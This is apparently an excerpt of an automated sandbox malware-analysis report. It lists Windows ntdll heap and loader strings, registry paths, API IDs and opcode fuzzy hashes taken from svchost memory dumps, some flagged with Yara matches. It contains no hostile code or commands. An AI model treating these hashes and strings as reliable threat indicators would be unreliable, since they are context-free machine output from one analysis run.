                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      • API String ID: 0-1391187441
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 03343264
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0334327D
                                                                                                                      • HEAP[%wZ]: , xrefs: 03343255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 03331596
                                                                                                                      • HEAP[%wZ]: , xrefs: 03331712
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03331728
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      • API String ID: 0-2391371766
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a```$gfff${
                                                                                                                      • API String ID: 0-4226493348
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 0-1077428164
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      • API String ID: 0-318774311
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      • API String ID: 0-1537733988
                                                                                                                      Strings
                                                                                                                      • GlobalizationUserSettings, xrefs: 0340B834
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0340B82A
                                                                                                                      • TargetNtPath, xrefs: 0340B82F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      • API String ID: 0-505981995
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 0338E6B3
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0338E6C6
                                                                                                                      • HEAP[%wZ]: , xrefs: 0338E6A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      • API String ID: 0-1340214556
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 033DDC1F
                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 033DDC32
                                                                                                                      • HEAP[%wZ]: , xrefs: 033DDC12
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                      • API String ID: 0-3815128232
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 033A82E8
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 033A82D7
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 033A82DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 033EC1F1
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 033EC1C5
                                                                                                                      • PreferredUILanguages, xrefs: 033EC212
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 033B4899
                                                                                                                      • LdrpCheckRedirection, xrefs: 033B488F
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 033B4888
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 033A29FE
                                                                                                                      • RtlCreateActivationContext, xrefs: 033A29F9
                                                                                                                      • Actx , xrefs: 033633AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                      • API String ID: 0-859632880
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 033A1A51
                                                                                                                      • LdrpInitializeTls, xrefs: 033A1A47
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 033A1A40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-931879808
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0337127B
                                                                                                                      • BuildLabEx, xrefs: 0337130F
                                                                                                                      • @, xrefs: 033712A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                      • API String ID: 0-3051831665
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 033B20FA
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 033B2104
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 033B20F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                      • String ID: kLsE
                                                                                                                      • API String ID: 3446177414-3058123920
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@
                                                                                                                      • API String ID: 0-149943524
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      Strings
                                                                                                                      • Failed to retrieve service checksum., xrefs: 0338EE56
                                                                                                                      • ResIdCount less than 2., xrefs: 0338EEC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                      • API String ID: 0-863616075
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G*$gfff
                                                                                                                      • API String ID: 0-4083895161
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G*$gfff
                                                                                                                      • API String ID: 0-4083895161
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0333A2FB
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0333A309
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local\$@
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P`vRbv
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PATH
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PreferredUILanguages
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      • API String ID: 0-3265496382
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      • String ID: LdrCreateEnclave
                                                                                                                      • API String ID: 0-3262589265
                                                                                                                      • Opcode ID: ce4f46861c9204fbf1cd66baaa2d594578a82018b56c7585718e9d847a2b5af8
                                                                                                                      • Instruction ID: 2a621f0d180b5abc3663931113a38813f083eda4d31af92ee172be18f51b0188
                                                                                                                      • Opcode Fuzzy Hash: ce4f46861c9204fbf1cd66baaa2d594578a82018b56c7585718e9d847a2b5af8
                                                                                                                      • Instruction Fuzzy Hash: C12107B59183449FC320DF1AD884A9BFBF8EBD5B00F504A1EF6A49B250D7B49505CB92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7130a386caa42c6216d1e61face383a1263f6230e02f56f4399ed1e7f1553f92
                                                                                                                      • Instruction ID: ed5bcd696c74b45b8f59407b6cbf2b58d1059d01c95d2ec003a8c0b67a44b9a2
                                                                                                                      • Opcode Fuzzy Hash: 7130a386caa42c6216d1e61face383a1263f6230e02f56f4399ed1e7f1553f92
                                                                                                                      • Instruction Fuzzy Hash: 81823472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1d1593a700784f9a609f0936491a20609c29fee14848aac704109e79d6631d41
                                                                                                                      • Instruction ID: 2ca5e52c71c22e659c4cc8f08dc8d5f70b08a804520f3e952766ca268bbcd0f1
                                                                                                                      • Opcode Fuzzy Hash: 1d1593a700784f9a609f0936491a20609c29fee14848aac704109e79d6631d41
                                                                                                                      • Instruction Fuzzy Hash: F562923290464AAFEF39CF08D8D05AEFB66FE56314B49C59CC89A27604D335B944CBD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7abd7717b6bc3c76dd1249471627e5e1d4b58978d2b940ad7e801f7402dd060
                                                                                                                      • Instruction ID: d0435985fce192189019deef3303b41b258e535ce181b79104c04728a8eb4573
                                                                                                                      • Opcode Fuzzy Hash: e7abd7717b6bc3c76dd1249471627e5e1d4b58978d2b940ad7e801f7402dd060
                                                                                                                      • Instruction Fuzzy Hash: 41428E75A007168FDB19DF59C8C0ABEF7B6FF88314B288569E552AB340D734E842CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                      • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                      Memory Dump Source
